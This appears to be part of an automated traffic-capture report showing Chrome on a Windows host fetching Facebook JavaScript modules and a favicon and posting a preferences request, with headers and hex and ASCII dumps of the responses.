                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: J4mpuwoVElbxRBzAnWp/TjTrKPqthfL5PQKBNgXTnPeB7TiecvkgD4wBm+tzYyUx6ycr2zZV/NLnWjjaEB3ltw==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:24 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 82019
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC15871INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 4e 65 63 74 61 72 22 2c 5b 22 45 6e 76 22 2c 22 67 65 74 43 6f 6e 74 65 78 74 75 61 6c 50 61 72 65 6e 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 76 61 72 20 67 3b 66 75 6e 63 74 69 6f 6e 20 68 28 61 29 7b 61 2e 6e 63 74 72 7c 7c 28 61 2e 6e 63 74 72 3d 7b 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 61 29 7b 69 66 28 28 67 7c 7c 28 67 3d 62 28 22 45 6e 76 22 29 29 29 2e 6d 6f 64 75 6c 65 7c 7c 21 61 29 72 65 74 75 72 6e 28 67 7c 7c 28 67 3d 62 28 22 45 6e 76 22 29 29 29 2e 6d 6f 64 75 6c 65 3b 76 61 72 20 63 3d 7b 66 62 70 61 67 65 5f 66 61 6e 5f 63 6f 6e 66 69 72 6d 3a 21 30 2c 70 68 6f 74 6f 73 5f 73 6e 6f 77 6c 69 66 74 3a 21 30 7d 2c 64 3b 77 68 69
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("Nectar",["Env","getContextualParent"],(function(a,b,c,d,e,f){var g;function h(a){a.nctr||(a.nctr={})}function i(a){if((g||(g=b("Env"))).module||!a)return(g||(g=b("Env"))).module;var c={fbpage_fan_confirm:!0,photos_snowlift:!0},d;whi
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC16384INData Raw: 39 31 3b 74 68 69 73 2e 68 5b 31 5d 2b 3d 64 3b 64 3d 74 68 69 73 2e 68 5b 31 5d 3e 3e 3e 31 33 3b 74 68 69 73 2e 68 5b 31 5d 26 3d 38 31 39 31 3b 74 68 69 73 2e 68 5b 32 5d 2b 3d 64 3b 63 5b 30 5d 3d 74 68 69 73 2e 68 5b 30 5d 2b 35 3b 64 3d 63 5b 30 5d 3e 3e 3e 31 33 3b 63 5b 30 5d 26 3d 38 31 39 31 3b 66 6f 72 28 65 3d 31 3b 65 3c 31 30 3b 65 2b 2b 29 63 5b 65 5d 3d 74 68 69 73 2e 68 5b 65 5d 2b 64 2c 64 3d 63 5b 65 5d 3e 3e 3e 31 33 2c 63 5b 65 5d 26 3d 38 31 39 31 3b 63 5b 39 5d 2d 3d 31 3c 3c 31 33 3b 64 3d 28 64 5e 31 29 2d 31 3b 66 6f 72 28 65 3d 30 3b 65 3c 31 30 3b 65 2b 2b 29 63 5b 65 5d 26 3d 64 3b 64 3d 7e 64 3b 66 6f 72 28 65 3d 30 3b 65 3c 31 30 3b 65 2b 2b 29 74 68 69 73 2e 68 5b 65 5d 3d 74 68 69 73 2e 68 5b 65 5d 26 64 7c 63 5b 65 5d 3b
                                                                                                                                                                                                                                Data Ascii: 91;this.h[1]+=d;d=this.h[1]>>>13;this.h[1]&=8191;this.h[2]+=d;c[0]=this.h[0]+5;d=c[0]>>>13;c[0]&=8191;for(e=1;e<10;e++)c[e]=this.h[e]+d,d=c[e]>>>13,c[e]&=8191;c[9]-=1<<13;d=(d^1)-1;for(e=0;e<10;e++)c[e]&=d;d=~d;for(e=0;e<10;e++)this.h[e]=this.h[e]&d|c[e];
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC16384INData Raw: 74 72 65 61 6d 5f 73 61 6c 73 61 32 30 5f 78 6f 72 3a 77 2c 63 72 79 70 74 6f 5f 73 74 72 65 61 6d 5f 73 61 6c 73 61 32 30 3a 78 2c 63 72 79 70 74 6f 5f 6f 6e 65 74 69 6d 65 61 75 74 68 3a 42 2c 63 72 79 70 74 6f 5f 6f 6e 65 74 69 6d 65 61 75 74 68 5f 76 65 72 69 66 79 3a 43 2c 63 72 79 70 74 6f 5f 76 65 72 69 66 79 5f 31 36 3a 70 2c 63 72 79 70 74 6f 5f 76 65 72 69 66 79 5f 33 32 3a 71 2c 63 72 79 70 74 6f 5f 73 65 63 72 65 74 62 6f 78 3a 44 2c 63 72 79 70 74 6f 5f 73 65 63 72 65 74 62 6f 78 5f 6f 70 65 6e 3a 45 2c 63 72 79 70 74 6f 5f 73 63 61 6c 61 72 6d 75 6c 74 3a 53 2c 63 72 79 70 74 6f 5f 73 63 61 6c 61 72 6d 75 6c 74 5f 62 61 73 65 3a 54 2c 63 72 79 70 74 6f 5f 62 6f 78 5f 62 65 66 6f 72 65 6e 6d 3a 56 2c 63 72 79 70 74 6f 5f 62 6f 78 5f 61 66 74
                                                                                                                                                                                                                                Data Ascii: tream_salsa20_xor:w,crypto_stream_salsa20:x,crypto_onetimeauth:B,crypto_onetimeauth_verify:C,crypto_verify_16:p,crypto_verify_32:q,crypto_secretbox:D,crypto_secretbox_open:E,crypto_scalarmult:S,crypto_scalarmult_base:T,crypto_box_beforenm:V,crypto_box_aft
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC16384INData Raw: 6e 45 6e 61 62 6c 65 64 7c 7c 61 2e 6d 6f 7a 46 75 6c 6c 53 63 72 65 65 6e 45 6e 61 62 6c 65 64 7c 7c 61 2e 6d 73 46 75 6c 6c 73 63 72 65 65 6e 45 6e 61 62 6c 65 64 7c 7c 61 2e 66 75 6c 6c 73 63 72 65 65 6e 45 6e 61 62 6c 65 64 3b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 62 7c 7c 61 2e 77 65 62 6b 69 74 43 61 6e 63 65 6c 46 75 6c 6c 53 63 72 65 65 6e 7c 7c 61 2e 6d 6f 7a 43 61 6e 63 65 6c 46 75 6c 6c 53 63 72 65 65 6e 7c 7c 61 2e 6d 73 45 78 69 74 46 75 6c 6c 73 63 72 65 65 6e 7c 7c 61 2e 63 61 6e 63 65 6c 46 75 6c 6c 53 63 72 65 65 6e 7c 7c 61 2e 65 78 69 74 46 75 6c 6c 53 63 72 65 65 6e 29 7d 3b 72 65 74 75 72 6e 20 62 7d 28 63 28 22 6d 69 78 69 6e 22 29 28 63 28 22 41 72 62 69 74 65 72 4d 69 78 69 6e 22 29 29 29 3b 62 3d 6e 65 77 20 61 28 29 3b 65
                                                                                                                                                                                                                                Data Ascii: nEnabled||a.mozFullScreenEnabled||a.msFullscreenEnabled||a.fullscreenEnabled;return Boolean(b||a.webkitCancelFullScreen||a.mozCancelFullScreen||a.msExitFullscreen||a.cancelFullScreen||a.exitFullScreen)};return b}(c("mixin")(c("ArbiterMixin")));b=new a();e
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1500INData Raw: 62 29 7b 74 68 69 73 2e 24 31 3d 61 2c 74 68 69 73 2e 24 32 3d 62 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 67 65 74 55 52 49 42 75 69 6c 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 68 69 73 2c 64 3d 6e 65 77 28 63 28 22 58 43 6f 6e 74 72 6f 6c 6c 65 72 55 52 49 42 75 69 6c 64 65 72 22 29 29 28 74 68 69 73 2e 24 31 2c 74 68 69 73 2e 24 32 29 3b 69 66 28 61 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 67 65 74 52 65 71 75 65 73 74 28 61 29 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 68 69 73 2e 24 32 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 62 2e 24 32 5b 61 5d 2c 66 3d 22 22 3b 21 63 2e 72 65 71 75 69 72 65 64 26 26 21 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61
                                                                                                                                                                                                                                Data Ascii: b){this.$1=a,this.$2=b}var b=a.prototype;b.getURIBuilder=function(a){var b=this,d=new(c("XControllerURIBuilder"))(this.$1,this.$2);if(a){var e=this.getRequest(a);Object.keys(this.$2).forEach(function(a){var c=b.$2[a],f="";!c.required&&!Object.prototype.ha
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC15495INData Raw: 22 52 65 6c 6f 61 64 50 61 67 65 22 29 2e 6e 6f 77 28 29 7d 29 2e 73 65 6e 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 5c 78 61 30 22 2c 22 67 22 29 2c 22 26 6e 62 73 70 3b 22 29 7d 66 75 6e 63 74 69 6f 6e 20 65 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 26 6e 62 73 70 3b 22 2c 22 67 22 29 2c 22 5c 78 61 30 22 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 61 29 7b 6e 65 77 28 63 28 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 29 29 28 29 2e 73 65 74 55 52 49 28 69 29 2e 73 65 74 44 61 74 61 28 7b 72 6d 6f 64 65 3a 61 7d 29 2e 73 65 74 48 61 6e 64 6c 65 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 22 52 65 6c 6f 61
                                                                                                                                                                                                                                Data Ascii: "ReloadPage").now()}).send()}function b(a){return a.replace(new RegExp("\xa0","g"),"&nbsp;")}function e(a){return a.replace(new RegExp("&nbsp;","g"),"\xa0")}function f(a){new(c("AsyncRequest"))().setURI(i).setData({rmode:a}).setHandler(function(){d("Reloa


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                77192.168.2.449828157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC374OUTGET /rsrc.php/v3/yr/r/jJPH6iCu1HH.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: UCXVUk0oqmh5pfZQTG8VQA==
                                                                                                                                                                                                                                Expires: Sun, 21 Sep 2025 06:21:52 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 4X/gpWLiLyS9ijJJVvx+IbZRQNFPqvjIoXEKmAx0jlVW5B/im7DLEFjId5N+PZfdp0Es2iab+pRJ1ebZKcsrBQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:25 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=104, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 1854
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1853INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 53 75 62 73 63 72 69 70 74 69 6f 6e 73 48 61 6e 64 6c 65 72 22 2c 5b 22 69 6e 76 61 72 69 61 6e 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 6d 6f 76 65 7c 7c 61 2e 72 65 73 65 74 7c 7c 61 2e 75 6e 73 75 62 73 63 72 69 62 65 7c 7c 61 2e 63 61 6e 63 65 6c 7c 7c 61 2e 64 69 73 70 6f 73 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 61 29 7b 69 28 61 29 2e 63 61 6c 6c 28 61 29 7d 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 74 68 69 73 2e 24 31 3d 5b 5d 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("SubscriptionsHandler",["invariant"],(function(a,b,c,d,e,f,g,h){"use strict";function i(a){return a.remove||a.reset||a.unsubscribe||a.cancel||a.dispose}function j(a){i(a).call(a)}a=function(){function a(){this.$1=[]}var b=a.prototype


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                78192.168.2.449832157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC608OUTGET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1879INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: image/x-icon
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: jN3KQn2um5Jec0MvhzPgWg==
                                                                                                                                                                                                                                Expires: Thu, 18 Sep 2025 01:56:01 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 7+GULX2B8064JFcoJi0zd5Gz+j2BtY7l27ooE5OA9kdDLoZ+fdM1gwU7ouNPfv3mPrPsF8Mb7JeD090VCKfSsA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:25 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 4286
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1INData Raw: 00
                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC4285INData Raw: 00 01 00 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 10 00 00 c2 1e 00 00 c2 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 00 06 e2 65 04 47 e0 63 00 95 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e0 64 00 bf e0 63 00 95 e2 65 00 47 ff 80 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 6a 0b 18 e2 66 02 96 e1 66 01 f1 e2 66 01 ff e1 65 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                Data Ascii: ( @ eGcdceGjfffe


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                79192.168.2.449831157.240.253.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC841OUTPOST /shared/user_preferences/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 3711
                                                                                                                                                                                                                                X-FB-LSD: AVrwfIkMup0
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                X-ASBD-ID: 129477
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; _js_datr=d934ZsjiAffZHUJjG80fHvH1; wd=1280x907
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC3711OUTData Raw: 64 61 74 61 3d 65 79 4a 6c 64 6d 56 75 64 43 49 36 49 6d 78 76 5a 32 64 6c 5a 46 39 76 64 58 52 66 63 32 4e 68 62 6c 39 79 5a 58 4e 31 62 48 51 69 4c 43 4a 73 62 32 4e 68 62 46 39 7a 64 47 39 79 59 57 64 6c 49 6a 70 62 49 6c 4e 6c 63 33 4e 70 62 32 34 69 4c 43 4a 6f 59 6c 39 30 61 57 31 6c 63 33 52 68 62 58 41 69 4c 43 4a 7a 61 57 64 75 59 57 78 66 5a 6d 78 31 63 32 68 66 64 47 6c 74 5a 58 4e 30 59 57 31 77 49 6c 30 73 49 6e 4a 6c 63 33 56 73 64 48 4d 69 4f 6c 74 62 49 6e 4e 6a 63 6d 6c 77 64 43 49 73 49 6d 68 30 64 48 42 7a 4f 69 38 76 63 33 52 68 64 47 6c 6a 4c 6e 68 34 4c 6d 5a 69 59 32 52 75 4c 6d 35 6c 64 43 39 79 63 33 4a 6a 4c 6e 42 6f 63 43 39 32 4d 79 39 35 4d 53 39 79 4c 33 4d 78 62 30 5a 57 55 33 64 76 5a 6e 4d 31 4c 6d 70 7a 49 69 78 75 64 57
                                                                                                                                                                                                                                Data Ascii: data=eyJldmVudCI6ImxvZ2dlZF9vdXRfc2Nhbl9yZXN1bHQiLCJsb2NhbF9zdG9yYWdlIjpbIlNlc3Npb24iLCJoYl90aW1lc3RhbXAiLCJzaWduYWxfZmx1c2hfdGltZXN0YW1wIl0sInJlc3VsdHMiOltbInNjcmlwdCIsImh0dHBzOi8vc3RhdGljLnh4LmZiY2RuLm5ldC9yc3JjLnBocC92My95MS9yL3Mxb0ZWU3dvZnM1LmpzIixudW
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1900INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Set-Cookie: _js_datr=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=-1727585664; path=/; domain=.facebook.com; httponly
                                                                                                                                                                                                                                Set-Cookie: datr=d934ZsjiAffZHUJjG80fHvH1; expires=Mon, 03-Nov-2025 04:54:25 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923933763318518", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(self), clipboard-write=(self), compute-pressure=(), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(self), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), private-state-token-issuance=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                cross-origin-opener-policy: same-origin-allow-popups
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1123INData Raw: 72 65 70 6f 72 74 2d 74 6f 3a 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 5c 2f 63 6f 6f 70 5c 2f 3f 6d 69 6e 69 6d 69 7a 65 3d 30 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 6f 6f 70 5f 72 65 70 6f 72 74 22 2c 22 69 6e 63 6c 75 64 65 5f 73 75 62 64 6f 6d 61 69 6e 73 22 3a 74 72 75 65 7d 2c 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 61 6a 61 78 5c 2f 62 72 6f 77 73 65 72 5f 65 72 72 6f 72
                                                                                                                                                                                                                                Data Ascii: report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error
